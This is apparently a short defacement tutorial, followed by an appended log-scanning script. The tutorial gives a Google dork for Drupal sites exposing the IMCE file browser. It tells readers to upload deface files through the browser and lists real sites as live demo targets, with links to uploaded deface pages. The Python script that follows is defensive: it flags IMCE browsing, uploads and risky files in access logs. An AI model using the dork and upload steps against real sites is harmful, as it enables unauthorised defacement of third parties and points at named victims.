First, go to google.com and search for this dork:
Google dork: inurl:"/imce?dir=" intitle:"File Browser"
exploit : http://website.com/imce?dir=
Shell Access : http://website.com/files/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
A list of results will come up. Pick one of the sites and you can upload whatever you like.
Some sites only allow image uploads, so try it and see.
First, look for this directory:
http://website.com/imce?dir=
There, as shown in the picture, click upload and you can upload the deface file you want.
See this link: http://ciam.inra.fr/biosp/sites/ciam.inra.fr.biosp/files/images/medium_safe_image.php_.png (this one is an image)
http://www.la-gerbille.net/sites/default/files/tabelka/test.html (this one is an HTML file uploaded as a deface)
Live demo : http://labourlakesandfurness.co.uk/imce?dir=
Result: http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/test.html
Other demos
http://correaporto.com.br/english/imce?dir=.
http://www.somaly.org/imce?dir=
http://1daygraphics.com/imce?dir=client
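
A defender-side check for the exposure described above, as an added example that is not part of the original post: it scans web server access logs for successful requests to the IMCE path and for HTML or PHP-named files served from a `files/` directory. The Combined Log Format, the constructed sample lines, the function name `find_imce_abuse`, and treating a POST to the IMCE path as an upload are assumptions.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format (assumed): ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Files under a public files directory whose name suggests active content:
# .html/.htm pages, or ".php" anywhere in the name (covers munged names
# such as "image.php_.png").
RISKY_FILE_RE = re.compile(r'/files/(?:.*/)?[^/]*\.(?:html?$|php)', re.I)

def find_imce_abuse(lines):
    """Return (kind, client_ip, request_target) tuples worth reviewing."""
    findings, browsers = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        ok = status.startswith("2")
        if ok and url.path.rstrip("/").endswith("/imce"):
            browsers.add(ip)  # this client reached the file browser
            if method == "POST":  # assumption: POST to IMCE means an upload
                findings.append(("imce-upload", ip, target))
            elif "dir=" in url.query:
                findings.append(("imce-browse", ip, target))
        elif ok and RISKY_FILE_RE.search(url.path):
            # Same client opened IMCE earlier: likely checking its own upload.
            kind = "uploaded-file-hit" if ip in browsers else "risky-file-served"
            findings.append((kind, ip, target))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /imce?dir=. HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "POST /imce?dir=. HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /sites/default/files/test.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:14:00:00 +0000] "GET /sites/default/files/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:14:01:00 +0000] "GET /imce?dir=. HTTP/1.1" 403 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_imce_abuse(SAMPLE_LOG):
        print(*finding)
```

Logged-in editors generate the same request lines, so treat findings as review leads and check which roles are granted IMCE access.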